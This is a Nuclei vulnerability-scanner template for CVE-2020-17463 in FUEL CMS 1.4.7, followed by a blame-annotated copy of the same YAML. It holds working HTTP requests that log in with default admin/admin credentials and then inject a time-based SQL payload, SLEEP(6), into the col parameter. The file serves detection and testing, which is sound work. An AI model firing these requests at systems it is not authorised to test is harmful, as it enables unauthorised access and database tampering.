nuclei-templates/http/cves/2020/CVE-2020-17463.yaml

id: CVE-2020-17463

info:
  name: time based sqli
  author: Thirukrishnan
  severity: high
  description: |
    FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
  remediation: Fixed in version 115
  reference:
    - https://www.exploit-db.com/exploits/48741
  classification:
    cve-id: CVE-2020-17463
  tags: sqli,timebased

http:
  - raw:
      - |
        GET /fuel/index.php/fuel HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Referer: http://{{Hostname}}/fuel/index.php/fuel/login/5a6e566c62413d3d
        Connection: close
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1

      - |
        POST /fuel/index.php/fuel/login/5a6e566c62413d3d HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 67
        Connection: close
        Referer: http://{{Hostname}}/fuel/index.php/fuel/login/5a6e566c62413d3d
        Upgrade-Insecure-Requests: 1
        Sec-Fetch-Dest: document
        Sec-Fetch-Mode: navigate
        Sec-Fetch-Site: same-origin
        Sec-Fetch-User: ?1

        user_name=admin&password=admin&Login=Login&forward=5a6e566c62413d3d

      - |
        GET /fuel/index.php/fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        X-Requested-With: XMLHttpRequest
        Connection: close 
        Referer: http://{{Hostname}}/fuel/index.php/fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0
        Sec-Fetch-Mode: cors
        Sec-Fetch-Site: same-origin

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 302'
          - 'status_code_2 == 302'
          - 'status_code_3 == 200'
          - 'contains(body_3, "No data to display")'
          - 'duration>=6'
        condition: and
Create CVE-2020-17463.yaml Template for CVE-2020-17463 under defcon31 label 2023-07-16 07:35:32 +00:00			`id: CVE-2020-17463`

			`info:`
			`name: time based sqli`
Update CVE-2020-17463.yaml 2023-07-16 07:45:08 +00:00			`author: Thirukrishnan`
Create CVE-2020-17463.yaml Template for CVE-2020-17463 under defcon31 label 2023-07-16 07:35:32 +00:00			`severity: high`
			`description: \|`
			`FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.`
			`remediation: Fixed in version 115`
			`reference:`
			`- https://www.exploit-db.com/exploits/48741`
			`classification:`
			`cve-id: CVE-2020-17463`
			`tags: sqli,timebased`

			`http:`
			`- raw:`
			`- \|`
			`GET /fuel/index.php/fuel HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Accept-Encoding: gzip, deflate`
			`Referer: http://{{Hostname}}/fuel/index.php/fuel/login/5a6e566c62413d3d`
			`Connection: close`
			`Upgrade-Insecure-Requests: 1`
			`Sec-Fetch-Dest: document`
			`Sec-Fetch-Mode: navigate`
			`Sec-Fetch-Site: same-origin`
			`Sec-Fetch-User: ?1`

			`- \|`
			`POST /fuel/index.php/fuel/login/5a6e566c62413d3d HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8`
			`Accept-Language: en-US,en;q=0.5`
			`Accept-Encoding: gzip, deflate`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 67`
			`Connection: close`
			`Referer: http://{{Hostname}}/fuel/index.php/fuel/login/5a6e566c62413d3d`
			`Upgrade-Insecure-Requests: 1`
			`Sec-Fetch-Dest: document`
			`Sec-Fetch-Mode: navigate`
			`Sec-Fetch-Site: same-origin`
			`Sec-Fetch-User: ?1`

			`user_name=admin&password=admin&Login=Login&forward=5a6e566c62413d3d`

			`- \|`
			`GET /fuel/index.php/fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
			`Accept: /`
			`Accept-Language: en-US,en;q=0.5`
			`Accept-Encoding: gzip, deflate`
			`X-Requested-With: XMLHttpRequest`
			`Connection: close`
			`Referer: http://{{Hostname}}/fuel/index.php/fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0`
			`Sec-Fetch-Mode: cors`
			`Sec-Fetch-Site: same-origin`

			`cookie-reuse: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code_1 == 302'`
			`- 'status_code_2 == 302'`
			`- 'status_code_3 == 200'`
			`- 'contains(body_3, "No data to display")'`
			`- 'duration>=6'`
			`condition: and`